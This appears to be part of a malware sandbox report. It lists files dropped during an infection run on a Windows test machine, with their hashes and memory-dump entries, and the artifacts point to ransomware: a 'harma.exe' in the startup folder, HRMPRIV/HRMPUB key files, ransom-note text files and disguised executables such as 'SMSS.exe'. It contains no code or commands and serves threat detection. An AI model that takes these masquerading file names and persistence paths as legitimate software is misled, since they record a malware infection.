C:\Users\Admin\AppData\Local\Temp\_MEI5362\select.pyd
| MD5 | 6ae54d103866aad6f58e119d27552131 |
| SHA1 | bc53a92a7667fd922ce29e98dfcf5f08f798a3d2 |
| SHA256 | 63b81af5d3576473c17ac929bea0add5bf8d7ea95c946caf66cbb9ad3f233a88 |
| SHA512 | ff23f3196a10892ea22b28ae929330c8b08ab64909937609b7af7bfb1623cd2f02a041fd9fab24e4bc1754276bdafd02d832c2f642c8ecdcb233f639bdf66dd0 |
C:\Users\Admin\AppData\Local\Temp\_MEI5362\libcrypto-1_1.dll
| MD5 | bf83f8ad60cb9db462ce62c73208a30d |
| SHA1 | f1bc7dbc1e5b00426a51878719196d78981674c4 |
| SHA256 | 012866b68f458ec204b9bce067af8f4a488860774e7e17973c49e583b52b828d |
| SHA512 | ae1bdda1c174ddf4205ab19a25737fe523dca6a9a339030cd8a95674c243d0011121067c007be56def4eaeffc40cbdadfdcbd1e61df3404d6a3921d196dcd81e |
C:\Users\Admin\AppData\Local\Temp\_MEI5362\_lzma.pyd
| MD5 | 37057c92f50391d0751f2c1d7ad25b02 |
| SHA1 | a43c6835b11621663fa251da421be58d143d2afb |
| SHA256 | 9442dc46829485670a6ac0c02ef83c54b401f1570d1d5d1d85c19c1587487764 |
| SHA512 | 953dc856ad00c3aec6aeab3afa2deb24211b5b791c184598a2573b444761db2d4d770b8b807ebba00ee18725ff83157ec5fa2e3591a7756eb718eba282491c7c |
C:\Users\Admin\AppData\Local\Temp\_MEI5362\_tkinter.pyd
| MD5 | 7244bcee3ec369a9c503d16e5dfd2715 |
| SHA1 | d3b126e07df3a6d902b12def8151957be9ca1b03 |
| SHA256 | 6b40fe9ecc1b1749c174069f421143c63e87486294af39bbe83fbd6be797c0a1 |
| SHA512 | 6e49dc62f4dfe61eecb25e98f8eb3685afa53c7d5b05ac48139721778a8224f85bc74bee6f29974c6fc2cebd20f0f6628b73ebf168bf8cff80b21d24a83ff92d |
C:\Users\Admin\AppData\Local\Temp\_MEI5362\PIL\_imaging.cp38-win_amd64.pyd
| MD5 | 1a8430753796dc23efb41d252ace96b3 |
| SHA1 | 675ecf6e29e633307f248698eb1d170f07d0bdf2 |
| SHA256 | 76562ab98952a33eae401ff47bcff52a0e3df60b7a2625d48d08d72e48944dfa |
| SHA512 | b5eb5fc513395e2a99081a0188e6bd7dfa35af5df83445a54bd149c39cc8089384cdf82e71f76ba6efe899b8cb09f88aae0d93e529113c64090deb7ecf17fd49 |
memory/5324-1334-0x0000000000400000-0x0000000000409000-memory.dmp
memory/3916-1353-0x00000000068D0000-0x00000000068F8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI5362\pyexpat.pyd
| MD5 | e684792507faf113474a6d1217aeeaad |
| SHA1 | f9486048ec025a9f469f52c1788a74e70975b431 |
| SHA256 | 1035c85c840c1007d5f5bb62ca7358d6c85b5e4bf15155fe0857c6a17453f18a |
| SHA512 | 1a50bc231963d405f25879ee3560eb90f7b18d51640b9b4d848f18caa9fef14907f8935a86f093478be0ee0e1261e4bcc8c697b486bc0617c5f77370337d48c3 |
C:\Users\Admin\AppData\Local\Click\HEUR-Trojan-Ransom.MSIL.C_Url_zsu0ydf3d5jpakpvvnbdtonop2l5ggr2\1.0.0.0\1pggrlpy.newcfg
| MD5 | 8e491773294ae50327bcda52b979181c |
| SHA1 | a9df646b16b61ae14899431a016d6cf84cc2fb25 |
| SHA256 | f6be9df48478ab3cbeb811f1d6d553e4a7047485d0a37dc755dbadbe1b106a1a |
| SHA512 | 6d74fff4f3329c012c1fb4d50f4458acece1ae4f7bf0d3c064bef9fd5d4ef2f0f7b15080697f6bc69a5550e903374ca6ec108d147d66f0f5b32be1f6ce8b7ff3 |
C:\Users\Admin\AppData\Local\Click\HEUR-Trojan-Ransom.MSIL.C_Url_zsu0ydf3d5jpakpvvnbdtonop2l5ggr2\1.0.0.0\user.config
| MD5 | c6e79fdc54420411201f97198f8a3b3a |
| SHA1 | 5c78971317493fe97e861963a7cc187cff25cf66 |
| SHA256 | 9e2d609b228bed29e16d7c22c43f65f82f2ab8b2354f11778f204bbc8184a641 |
| SHA512 | d0d5145df4c30679f52ff8e89b5c0da47c4db6683cfe052f9229bffa942a12a182a21ad6b5d4f8bd6d8c001840abdbfcbfaa4ba075dce53ace146f0338b524b4 |
memory/5836-1399-0x0000000003520000-0x000000000352F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-7D1QT.tmp\Uninstall.png
| MD5 | 1dbec7e15bb3fe912ea362c7f5305cb8 |
| SHA1 | 8ee2dca3f834cd7809dd50681bb432fa17f982f6 |
| SHA256 | 43bfe50a575e87237abe4f65eee18b23e667c0a6c9fa1fd6fc2176948edfa527 |
| SHA512 | dc46536df17a17410a4aa2b6afaee9a620612e23498d009e766411bf2d17c87da0ac3b3f5a950375c34f4355f6b2924dfdc99c52102e1e702fd55f29333fc55f |
C:\Users\Admin\AppData\Local\Temp\is-7D1QT.tmp\Exit.png
| MD5 | 91f97aa4b051e7b2991e5456d2c8655b |
| SHA1 | 901dd406613f3e97d8d6141bb061b242a3b5fb4f |
| SHA256 | 0ff3fbfbb177d5ffc8b577f821a91f9d39f13f5f548f9570c12cb85ccef526e3 |
| SHA512 | b664f7aff75308d416c9e479bbd9a9b840816d41fb1dc218187c01636e443c4c7976a635459f626f971961c89d0b8e3c91bb0d61940e487a36179437fb0aa296 |
C:\Users\Admin\AppData\Local\Temp\is-7D1QT.tmp\Tile1_Icon1.png
| MD5 | 7355bb3e01185a5731321a4e54d73a15 |
| SHA1 | 2c230ffe0c69e8fb7300f63f977ea7dcbc341ac2 |
| SHA256 | 22234193ad6d8ecf908641868f55cd11da35854b9f724870eaeea4adf373c07f |
| SHA512 | a85e6904af9a1227ab72f15f1123af64198cbd676956629c1ce45838058483c8eaade39bd0b2ceab75e01707cf5c6ae69f3fc79c699e017657ef3e97c8a6a441 |
C:\Users\Admin\AppData\Local\Temp\is-7D1QT.tmp\Tile1_Background.jpg
| MD5 | 7920fec5d32f0ed0c53a0e5b7fd9a39b |
| SHA1 | b1d48b2af7773b601d733e8d71f95ad44407b4c6 |
| SHA256 | 40d232dde22ae1f9dccff6a82b170d5a7551cb31f447ed9d3261cd891711c10d |
| SHA512 | 256abb4d5d9bd6b7b7b444388de3682cba47e13703d697a0001aec2fc38b3b3a2dc378f1ca91adb939caf09d3ef9caeb9fd4919295302407bc3689d9ce2c0602 |
C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
| MD5 | a81543e890960d1f147a1c7bc60b2e4f |
| SHA1 | 9ef302edeb2ab9b0172ca36a04d9c679bfca4a7c |
| SHA256 | eb5eaca8a2e568d41f37d09de8d85f43d235e1a60b917563de6af835f00ceb64 |
| SHA512 | 7499bbc21cf0f021f0335ce0cc60a1ca15ef41f0e9915c2fb899bcf6a63ffcba2b2671229280fa5f20e28667116b141f572e8f27a74a32c030f27b269baf7378 |
C:\Users\Admin\AppData\Local\Temp\is-7D1QT.tmp\logo.png
| MD5 | 9221dde51c33003cae80579d83489d1d |
| SHA1 | 02b464eef0fe04c468301fb7e2706b74f1ad0f7b |
| SHA256 | 7f25b3a56af6f448d799ac8dcfa89ed1583d124c31529cf0b8713475a2299748 |
| SHA512 | e1ffd8447555d6d563466bb5417a2df4720369c14432e458da3ca1954e42b988bdc7bb8f925ac5918072f3f7d2874469bd726f96533a5207ec4ef196244ee136 |
C:\Users\Admin\AppData\Local\Temp\is-7D1QT.tmp\Lockscreen_overlay.png
| MD5 | f5f4fe2b811e5a07ae1184579cf36557 |
| SHA1 | 9ae1594e259f1aa06734c8653796596113f2d08b |
| SHA256 | d66bbf3a8d5f5890c3dbc95e77068abb10f3db4ebd0c71ae5dbf15d99174889c |
| SHA512 | eded97ed79f84916e5727f83e170f3999478df537bebe39767c49a3bedf4c86cd5bc3dcfd5d767559b9333ce9e06bddeceb96469e5a70eaae47145a838438f56 |
C:\Users\Admin\AppData\Local\Temp\is-7D1QT.tmp\Lockscreen.jpg
| MD5 | 152ae83219fb8786875669bfcf07f99f |
| SHA1 | 210ae7258ebb0ce5449bf08d6bb9292f8b533b94 |
| SHA256 | 2aa1525e90847f128e2cddc802cf59ba30ab4248cf8bbe6fb50cd75e3ab05b9b |
| SHA512 | 498d2a9476e05ae1c35280704ebe6a946237c71ac05d5a123323e4c2731adedd43248671dc20312e254b70b1140d8073c51de601adbb48461a8bd2370b2bc014 |
memory/2344-1471-0x000000000B5E0000-0x000000000BD86000-memory.dmp
memory/5324-1475-0x0000000000400000-0x0000000000409000-memory.dmp
C:\Users\Admin\Desktop\index.html
| MD5 | cb1a31fedc604d26b8beb12561082617 |
| SHA1 | d33c2c05e4532049cc1124a71fbbe59b9bd19696 |
| SHA256 | dd84609be3a7f63aab5853d22170129de542ea4810c76760e40791010eab9506 |
| SHA512 | 7b3559f3e33c18545d56cd892e03062c33e650450d4e39d0ee0bfeaf0f1cfa8037e5e529d47c72924ed3ec12631e885b0b1d0a5d03e943f0ffed15f9809ffc62 |
memory/5864-1473-0x0000000000400000-0x0000000000409000-memory.dmp
memory/3464-1484-0x0000000006140000-0x000000000616C000-memory.dmp
C:\Users\Admin\Pictures\README.txt
| MD5 | 365c502640bca4b34af55c726037894a |
| SHA1 | 4ba1dc559bdcc223ca46dbc94a0c5c9e749a6b79 |
| SHA256 | 4e79b63103b2341d4666279bc3012983f369a687527cf3fa5ffac7c9b3d665f5 |
| SHA512 | 78b2f483432a2b1a31f49f4cfcddf4d23ae5d4cb4c1821b5d636b76770337e9a80075fb0d2274e721ef46570ad461c597b1b7ebca52b0ed3a4456dfbafc6941b |
memory/3464-1519-0x00000000086F0000-0x000000000879A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-7D1QT.tmp\Install.png
| MD5 | 3a104b9ff4b59bba6dc3b30114c5b31b |
| SHA1 | 3a03ebe2b3ff5d4bac88355c82a86da3bb30cfde |
| SHA256 | 1a72008c2393b330c3a9e05bcba070e538d9d5078767adc49a86a05473226ced |
| SHA512 | 8d4d985d5003b2b7739c9f5549b8ea143adcfa78188fea45de49a73f82dd1e88709ef35a62bdcfdf360a1d3face0cb40fb8ff782d15f5081127dd6121a7e0289 |
C:\Users\Admin\AppData\Local\Temp\is-7D1QT.tmp\Dark.png
| MD5 | 185d31c702a861fd7026c693513eb3fb |
| SHA1 | 4857cba77bce860ee34df70d2ed06ac51958b53f |
| SHA256 | 56e1b926b344ef760fea6a4fd862e066ea5295f7e5671fc7c0d1f1bc148e2009 |
| SHA512 | 9cabac5d73a9dada0d809fdfbbb552c105d0de975a545fef70322b8c86b001691af6e2dc58e980343342a953bed12d91553dc253928cd6357836b6aaf5efb8e4 |
C:\Users\Admin\AppData\Local\Temp\is-7D1QT.tmp\Autorun1.jpg
| MD5 | 0b892ef46dcd514b3491af97ed44378a |
| SHA1 | 231ec5b57062854fb751687fd960574d18c565e4 |
| SHA256 | 0d26a52ea0535e0f81e163436b1b7e710843e045e5fc95a86229d68c92a59638 |
| SHA512 | 5990311a9ed99890ef3706e9a5f09131f0703aa8b0bbfaa99383856df81eea6900099ace6933bf53cf2a1827bbcfb74b3fc06d8e860d720c2597c9c17b447861 |
C:\Users\Admin\AppData\Local\Temp\_MEI5362\_elementtree.pyd
| MD5 | 5240abc89bb0822b4f1d830883a17578 |
| SHA1 | 1b4412454e35ac9af9e1e13cf3a441f35e5c7a69 |
| SHA256 | dec95e6d7ac0f15daac635f1adda13b4289bbe7175ba0b14494dc983601f0590 |
| SHA512 | 215b1e807253826c17e9744f46d539c6ed0e0a5fa12ffa654603ceeb6252c64cea6c931404203364575de709fd2d964d0ee719f1cc881bd98c5b495885e63d29 |
C:\Users\Admin\AppData\Local\Temp\_MEI5362\_bz2.pyd
| MD5 | 3dc8af67e6ee06af9eec52fe985a7633 |
| SHA1 | 1451b8c598348a0c0e50afc0ec91513c46fe3af6 |
| SHA256 | c55821f5fdb0064c796b2c0b03b51971f073140bc210cbe6ed90387db2bed929 |
| SHA512 | da16bfbc66c8abc078278d4d3ce1595a54c9ef43ae8837ceb35ae2f4757b930fe55e258827036eba8218315c10af5928e30cb22c60ff69159c8fe76327280087 |
C:\Users\Admin\AppData\Local\Temp\_MEI5362\_hashlib.pyd
| MD5 | a6448bc5e5da21a222de164823add45c |
| SHA1 | 6c26eb949d7eb97d19e42559b2e3713d7629f2f9 |
| SHA256 | 3692fc8e70e6e29910032240080fc8109248ce9a996f0a70d69acf1542fca69a |
| SHA512 | a3833c7e1cf0e4d181ac4de95c5dfa685cf528dc39010bf0ac82864953106213eccff70785021ccb05395b5cf0dcb89404394327cd7e69f820d14dfa6fba8cba |
C:\Users\Admin\AppData\Local\Temp\_MEI5362\_socket.pyd
| MD5 | d6bae4b430f349ab42553dc738699f0e |
| SHA1 | 7e5efc958e189c117eccef39ec16ebf00e7645a9 |
| SHA256 | 587c4f3092b5f3e34f6b1e927ecc7127b3fe2f7fa84e8a3d0c41828583bd5cef |
| SHA512 | a8f8fed5ea88e8177e291b708e44b763d105907e9f8c9e046c4eebb8684a1778383d1fba6a5fa863ca37c42fd58ed977e9bb3a6b12c5b8d9ab6ef44de75e3d1e |
C:\Users\Admin\AppData\Local\Temp\_MEI5362\libffi-7.dll
| MD5 | 4424baf6ed5340df85482fa82b857b03 |
| SHA1 | 181b641bf21c810a486f855864cd4b8967c24c44 |
| SHA256 | 8c1f7f64579d01fedfde07e0906b1f8e607c34d5e6424c87abe431a2322eba79 |
| SHA512 | 8adb94893ada555de2e82f006ab4d571fad8a1b16ac19ca4d2efc1065677f25d2de5c981473fabd0398f6328c1be1ebd4d36668ea67f8a5d25060f1980ee7e33 |
C:\Users\Admin\AppData\Local\Temp\_MEI5362\_ctypes.pyd
| MD5 | f1e33a8f6f91c2ed93dc5049dd50d7b8 |
| SHA1 | 23c583dc98aa3f6b8b108db5d90e65d3dd72e9b4 |
| SHA256 | 9459d246df7a3c638776305cf3683946ba8db26a7de90df8b60e1be0b27e53c4 |
| SHA512 | 229896da389d78cbdf2168753ed7fcc72d8e0e62c6607a3766d6d47842c0abd519ac4f5d46607b15e7ba785280f9d27b482954e931645337a152b8a54467c6a5 |
memory/5836-1275-0x0000000003390000-0x0000000003407000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-7D1QT.tmp\ISDone.dll
| MD5 | 4feafa8b5e8cdb349125c8af0ac43974 |
| SHA1 | 7f17e5e1b088fc73690888b215962fbcd395c9bd |
| SHA256 | bb8a0245dcc5c10a1c7181bad509b65959855009a8105863ef14f2bb5b38ac71 |
| SHA512 | d63984ee385b4f1eba8e590d6de4f082fb0121689295ec6e496539209459152465f6db09e6d8f92eec996a89fc40432077cbfa807beb2de7f375154fef6554bc |
C:\Users\Admin\AppData\Local\Temp\_MEI5362\base_library.zip
| MD5 | 19d34805782c4704d1e2a81fe32e9c27 |
| SHA1 | 8c3d99a0616abc478d6230d07f9dc7b38313813e |
| SHA256 | 06f3c20b42de72e69e9c6b2f66f149f5a65161873e30d07129333f53858d97bb |
| SHA512 | 267b8db8751ea170cd2e04ff5a4d87b0b65edc6d251a8016c213c97bcd8f3a12d955fc25860147b303b153b00d0a41191c09ed24e6fd4b95cb34ae98009456a4 |
C:\Users\Admin\AppData\Local\Temp\_MEI5362\VCRUNTIME140.dll
| MD5 | 0e675d4a7a5b7ccd69013386793f68eb |
| SHA1 | 6e5821ddd8fea6681bda4448816f39984a33596b |
| SHA256 | bf5ff4603557c9959acec995653d052d9054ad4826df967974efd2f377c723d1 |
| SHA512 | cae69a90f92936febde67dacd6ce77647cb3b3ed82bb66463cd9047e90723f633aa2fc365489de09fecdc510be15808c183b12e6236b0893af19633f6a670e66 |
C:\Users\Admin\AppData\Local\Temp\_MEI5362\ucrtbase.dll
| MD5 | bd8b198c3210b885fe516500306a4fcf |
| SHA1 | 28762cb66003587be1a59c2668d2300fce300c2d |
| SHA256 | ce2621719f1358508c2c33bcc1380d78a737ca20cd18c0ac89f38e1be788d9a2 |
| SHA512 | c32b6c083d3a7da01085718e5685e9a04034be91251c065794ceef1dfaaf6573fdd845cbc84e926ab3f510d295649cb6e497564fbe52cc79c053357c645c11a5 |
memory/3916-1526-0x00000000069A0000-0x0000000006A06000-memory.dmp
memory/3916-1527-0x0000000006960000-0x0000000006982000-memory.dmp
memory/6328-1539-0x0000000000400000-0x00000000005BB000-memory.dmp
memory/6048-1623-0x0000000000400000-0x000000000045F000-memory.dmp
C:\Program Files\7-Zip\7-zip.chm.exe
| MD5 | b09d15dc8353fab67cd6aa2728fc5c4d |
| SHA1 | dab074c0f1fbeae7c1114c208da1d98d0f30e6a5 |
| SHA256 | ea4286761146e59bb97b1970c9e14efe95f65ceb73bdfe27cc38ea2d9c123272 |
| SHA512 | 0b0240cd59c1a1f406c8e1bc027ae0d374486bad97bfa16ae5a90a8dce5f042df4d3c8518fbf3b676eeb1f20357d5e6d6260fa4632cf60b983201edd8b354349 |
memory/6392-1636-0x0000020A64000000-0x0000020A6404E000-memory.dmp
memory/7116-1635-0x0000000000560000-0x000000000057B000-memory.dmp
memory/5872-1631-0x0000000000FB0000-0x0000000000FD8000-memory.dmp
C:\Windows\SysWOW64\HelpMe.exe
| MD5 | 81d2e40b9439addc10146f3a6f001fe2 |
| SHA1 | 58be1c13baab725c752ef723c33f03e2d64ae4cb |
| SHA256 | 7c32e79fe312e6e108f6be3312510888bc7a8a44722e842ee4eea679eedb6ed9 |
| SHA512 | 02724c366df565bd2b2cf85ca4bf61fcc7b171494c8b0ad4d20740adda8b850e4baae5510e2a919e40ffb2ff2eae9f902ec9b7afff3f4cf85e3eddb80a6271a0 |
memory/3972-1626-0x00000000002F0000-0x0000000000324000-memory.dmp
memory/5872-1646-0x0000000002F30000-0x0000000002F50000-memory.dmp
memory/5016-1645-0x00000000005A0000-0x00000000007DA000-memory.dmp
memory/6048-1643-0x00000000020A0000-0x00000000020B7000-memory.dmp
memory/6048-1642-0x0000000000400000-0x000000000045F000-memory.dmp
memory/4792-1658-0x0000000000400000-0x0000000000442000-memory.dmp
memory/7684-1663-0x0000000000400000-0x0000000000537000-memory.dmp
memory/7684-1664-0x0000000000400000-0x0000000000537000-memory.dmp
memory/5836-1667-0x0000000000400000-0x000000000058E000-memory.dmp
memory/5836-1669-0x0000000003520000-0x000000000352F000-memory.dmp
memory/6708-1670-0x0000000001300000-0x0000000001312000-memory.dmp
memory/7860-1677-0x00000000009A0000-0x00000000009F6000-memory.dmp
memory/5864-1725-0x0000000000400000-0x0000000000409000-memory.dmp
F:\AUTORUN.INF
| MD5 | ca13857b2fd3895a39f09d9dde3cca97 |
| SHA1 | 8b78c5b2ec97c372ebdcef92d14b0998f8dd6dd0 |
| SHA256 | cfe448b4506a95b33b529efa88f1ac704d8bdf98a941c065650ead27609318ae |
| SHA512 | 55e5b5325968d1e5314527fb2d26012f5aae4a1c38e305417be273400cb1c6d0c22b85bddb501d7a5720a3f53bb5caf6ada8a7894232344c4f6c6ef85d226b47 |
memory/7860-1681-0x00000000052F0000-0x00000000052FA000-memory.dmp
memory/7860-1680-0x0000000005280000-0x00000000052D6000-memory.dmp
memory/5836-1668-0x0000000003390000-0x0000000003407000-memory.dmp
C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt19.lst
| MD5 | 339f910ea873a2b96e54337122f8a77b |
| SHA1 | 4e9d6bbf55904b37f4dead8f64bdf84e425fc1fc |
| SHA256 | de62f4507db6608d5e047a15dbb793e6d6b663a6f6e511859e5e85b626184b82 |
| SHA512 | 781a639aba601fdf2a74eeb4d6874ff03bae3fd271a628ece951054bf9616d295ab7e2abde4d403a9223cec7b5d1470686f2c4acbda6a38c2d92bfcc846750de |
memory/6124-1748-0x0000000000400000-0x000000000041F000-memory.dmp
memory/7116-1750-0x0000000000400000-0x0000000000444000-memory.dmp
memory/7116-1751-0x0000000001FA0000-0x0000000001FB7000-memory.dmp
memory/6792-1756-0x0000000000400000-0x000000000041F000-memory.dmp
memory/6840-1755-0x0000000000400000-0x000000000041F000-memory.dmp
memory/6916-2651-0x0000000000400000-0x000000000041F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\system.exe
| MD5 | a403f16a065214c831cb7a2a4bcf6169 |
| SHA1 | c989a62e3681b35d77993cc000882d7c72a3194e |
| SHA256 | cdc1cc9abef2cb170ec2e635b1e43541e89ebe5a68fc1e516f5d7a9759025bbb |
| SHA512 | 96ee9cbec77cf65607a52bb698ab7218923fd3df60bad5a795cf5f462820d16f25a394e3ff7323845554465a8169fa8482fd0585f1241e3390dd6aa3bc9d7a06 |
memory/6848-2722-0x0000000000400000-0x000000000041F000-memory.dmp
memory/456-2721-0x0000000000400000-0x000000000041F000-memory.dmp
memory/6328-2804-0x0000000000400000-0x00000000005BB000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe
| MD5 | 30e1234ef3e570667526fdb006832b12 |
| SHA1 | 01de8ba945945b58824f69553ac0f7b048645d45 |
| SHA256 | 72ea5a2972634a78b4808d2164517dc8dbed4eef24d05d135dbe537e05208bf2 |
| SHA512 | 00bd673f43cba1b16363433e672b30d22196fa0b67c024f970da15270323e545d15b3b990ed1dbbc3e7b9421c3f7840b10621c76203f89e0bcb1214e2a129e4e |
memory/7416-2846-0x0000000000780000-0x00000000007D4000-memory.dmp
memory/7240-2859-0x0000000000400000-0x000000000042F000-memory.dmp
memory/5836-2959-0x0000000000400000-0x000000000058E000-memory.dmp
C:\831897~1.EXE
| MD5 | 83189702fc6166ca3f6aaba5c410d352 |
| SHA1 | b5ffb63a62568d9bc37bd5f663a940e4efbdaf90 |
| SHA256 | 61259e83593b1dd5a440454c1e69eddf25e6cb1ba9bc8be0336a8d7431fcce76 |
| SHA512 | e0b6b985602862c55bc0e562a5c993ee6b0c7e4c29d0e0f0fc19824c22646b7aba95be92c7cec76244f3cf5a9cc93fc354cb407dd0c661574e88d7dd575699d5 |
C:\Users\Admin\AppData\Local\Temp\wujek.exe
| MD5 | fdc4710114781fd6b2ee6eaa87473f20 |
| SHA1 | 5b0c040581b42eb32e673b7df9155d7b773a00e5 |
| SHA256 | 95551434e9388ff0f282cb4f015ee3e5a56c730e54254b69905ae336bb28654b |
| SHA512 | 369d108cb60b7c77f49805b67071c314b904d8fb7ed0aef8893fae9f837e7217f4cbe062788221f763645fea864e7ca8a5417d509551f4a4594410ebb8cf9266 |
memory/8348-3005-0x0000000000400000-0x0000000000413000-memory.dmp
memory/9396-3134-0x0000000002210000-0x0000000002227000-memory.dmp
memory/9396-3133-0x0000000000400000-0x0000000000430000-memory.dmp
C:\xk.exe
| MD5 | bddd446594b299220998cfd47e0ff355 |
| SHA1 | b29fd87008980d5fc154ff7c88d25112bccc9286 |
| SHA256 | cf1b437b549b1d33704ff504940c50e7943fe7eb70fb927a8b161ea383df5954 |
| SHA512 | c89b710712802d8265e8d86521d96d7ef336f3d5d7d72618ea6e555d4da30f6fddadd453045b76c4b4abdd6a243684a92c17973aebaafee280af4498cd8ffd39 |
memory/7064-3191-0x0000000000400000-0x000000000041F000-memory.dmp
C:\ProgramData\HRMPRIV
| MD5 | 8b39f65636060dcd9fd8d77e6f1eb2bf |
| SHA1 | daf0a89f9748575f54f407a11384eeddbbc526b4 |
| SHA256 | 3280b00660e11afd61c768a7723518482441c2f29dc7903445a63478962b643c |
| SHA512 | 4142518e808f7da33bc3f7b2a7769b31919fb881d12c3210573ce51377e7da6a955723d4abd2766701ffbb07ac57864d8e9cad44e8676822f33a4a43e3ebe53e |
memory/10848-3283-0x0000000000400000-0x0000000000426000-memory.dmp
memory/7240-3282-0x0000000000400000-0x000000000042F000-memory.dmp
memory/10848-3301-0x0000000000400000-0x0000000000426000-memory.dmp
memory/6708-3318-0x0000000000D50000-0x0000000000D58000-memory.dmp
memory/11500-3353-0x0000000000400000-0x000000000042F000-memory.dmp
memory/11500-3361-0x0000000000400000-0x000000000042F000-memory.dmp
memory/7184-3371-0x0000000000400000-0x000000000042F000-memory.dmp
memory/11696-3378-0x0000000000400000-0x000000000042F000-memory.dmp
C:\ProgramData\HRMPUB
| MD5 | 2818dfcd305d3f5aebc84021884b0d0f |
| SHA1 | 1919744659143709df60ad54dcf52328f8676e08 |
| SHA256 | 73cadd88afa60513ab029eb686c6ff902fbd566c0c290a5d5194b7eb0a3e6360 |
| SHA512 | bbeb730f9b28dfc3410351ff50aa25c27d689bc55c717b9ffca4c1c4e117213c354d6d73a62782c1f33e435d92cf0456923a8a9834b42a4cd2ee6ff5268f68ab |
memory/8524-3396-0x0000000000400000-0x000000000042F000-memory.dmp
memory/11976-3422-0x0000000000400000-0x000000000042F000-memory.dmp
memory/7668-3441-0x0000000000400000-0x000000000042F000-memory.dmp
memory/8320-3449-0x0000000000400000-0x000000000042F000-memory.dmp
memory/6328-3580-0x0000000000400000-0x00000000005BB000-memory.dmp
memory/11032-3619-0x0000000000400000-0x0000000000426000-memory.dmp
memory/11044-3654-0x0000000006BB0000-0x0000000006BC4000-memory.dmp
memory/11044-3655-0x0000000009940000-0x0000000009946000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SMSS.exe
| MD5 | 0e362e7005823d0bec3719b902ed6d62 |
| SHA1 | 590d860b909804349e0cdc2f1662b37bd62f7463 |
| SHA256 | 2d0dc6216f613ac7551a7e70a798c22aee8eb9819428b1357e2b8c73bef905ad |
| SHA512 | 518991b68496b3f8545e418cf9b345e0791e09cc20d177b8aa47e0aba447aa55383c64f5bdaca39f2b061a5d08c16f2ad484af8a9f238ca23ab081618fba3ad3 |
memory/11516-3720-0x0000000000400000-0x000000000042F000-memory.dmp
memory/11032-3778-0x0000000000400000-0x0000000000426000-memory.dmp
memory/11984-3779-0x0000000000400000-0x000000000042F000-memory.dmp
C:\desktop.ini
| MD5 | c00d8433fe598abff197e690231531e0 |
| SHA1 | 4f6b87a4327ff5343e9e87275d505b9f145a7e42 |
| SHA256 | 52fb776a91b260bf196016ecb195550cdd9084058fe7b4dd3fe2d4fda1b6470e |
| SHA512 | a71523ec2bd711e381a37baabd89517dff6c6530a435f4382b7f4056f98aff5d6014e85ce3b79bd1f02fdd6adc925cd3fc051752c1069e9eb511a465cd9908e1 |
C:\XK\Folder.htt
| MD5 | 5d142e7978321fde49abd9a068b64d97 |
| SHA1 | 70020fcf7f3d6dafb6c8cd7a55395196a487bef4 |
| SHA256 | fe222b08327bbfb35cbd627c0526ba7b5755b02ce0a95823a4c0bf58e601d061 |
| SHA512 | 2351284652a9a1b35006baf4727a85199406e464ac33cb4701a6182e1076aaff022c227dbe4ad6e916eba15ebad08b10719a8e86d5a0f89844a163a7d4a7bbf9 |
C:\ProgramData\readme.txt
| MD5 | 0fcf534007952d7d5b15dcb256af5f26 |
| SHA1 | ef9032bfdc14226fae860602fb45d3b9d70086a6 |
| SHA256 | f872f34286d027bc229b27bceb753a8b7f6920a5891e3f5f9e1b50a4d0d279d1 |
| SHA512 | 17c74fa73663e9d236b3c77da668cd11202dca10ca059c22f6e6594b1111cb7116d4ae2ad0b0556dd9056a0b29866060bb84299660f253e816266692e60e013f |
C:\Users\Admin\AppData\Local\Temp\SMSS.txt
| MD5 | 39fbeb7cf4e860167b761a68db478601 |
| SHA1 | 81f743f1c236d41a681d1b1ebb13b88fb110a83a |
| SHA256 | f81c77943de0bf35206d8c951b9b0215e391c16f67a541aaf030f0856332168a |
| SHA512 | 149b1574193d8b0463c8d7718514166f01c8d96882992c6d14efa0545c0bbeb286fff0e3e627aea41145baa545b46400cc297e06e66ec1f342a3e231b8039299 |
C:\Users\Admin\Desktop\00467\EO.WebBrowser.WinForm.dll
| MD5 | 157d2b95317fcf9b0d00852b69e961b6 |
| SHA1 | b97b4b1421c28d829728e4671f1646be4eed5600 |
| SHA256 | 849ec8518b984fb2ecf20ad1c37861bb7c3611ccace16c347ee21d2e748571e9 |
| SHA512 | a85b657c8098d02efa915c48cacc591293824c2e1462587ff23d45389f47cc43cf4d34bf6ab7c78aa88473dd5405c80d603f0ab753edcad88f9ca2047ab93381 |
memory/3464-3865-0x0000000006560000-0x000000000656C000-memory.dmp
C:\Users\Admin\Desktop\00467\EO.WebBrowser.dll
| MD5 | ec5df4bb5343904e1b1203ed5f16ef02 |
| SHA1 | 94c7c587ae21e8bb2b784e61ef00115e56da919b |
| SHA256 | 87230c94aa6ea78f83aec86505266e111c1ea741fd4e22c0d10013e4d6ad1750 |
| SHA512 | ab2aac39d30a1c7dc793db49e97a9b9b6df10056c2eeb97ccac6e0775a3f2ec245c58752a4bbedce323fd31a4f33a3e75acca185684f956c7e9255feb904d463 |
memory/3464-3869-0x0000000007140000-0x00000000071C2000-memory.dmp
C:\Users\Admin\Desktop\00467\EO.Base.dll
| MD5 | 099cc5212f1604ef62e838a386058eea |
| SHA1 | bf6b9627546fa4252416ab19e411f77a65132e3a |
| SHA256 | 4be3451d4ffdd7bd76e14655ceb11e256f8f501fcbde8bfa74ec548fff502dc9 |
| SHA512 | d763a6edd4c0156a7edde2bc635105b4020524e11eac3d5b07555844b2224ffa60acd8421fff72c505bdd0b3fddce619bf82fda6ee530555db7ce83955b6c466 |
memory/3464-3880-0x0000000009970000-0x0000000009F46000-memory.dmp
memory/3464-3885-0x000000000E230000-0x0000000012506000-memory.dmp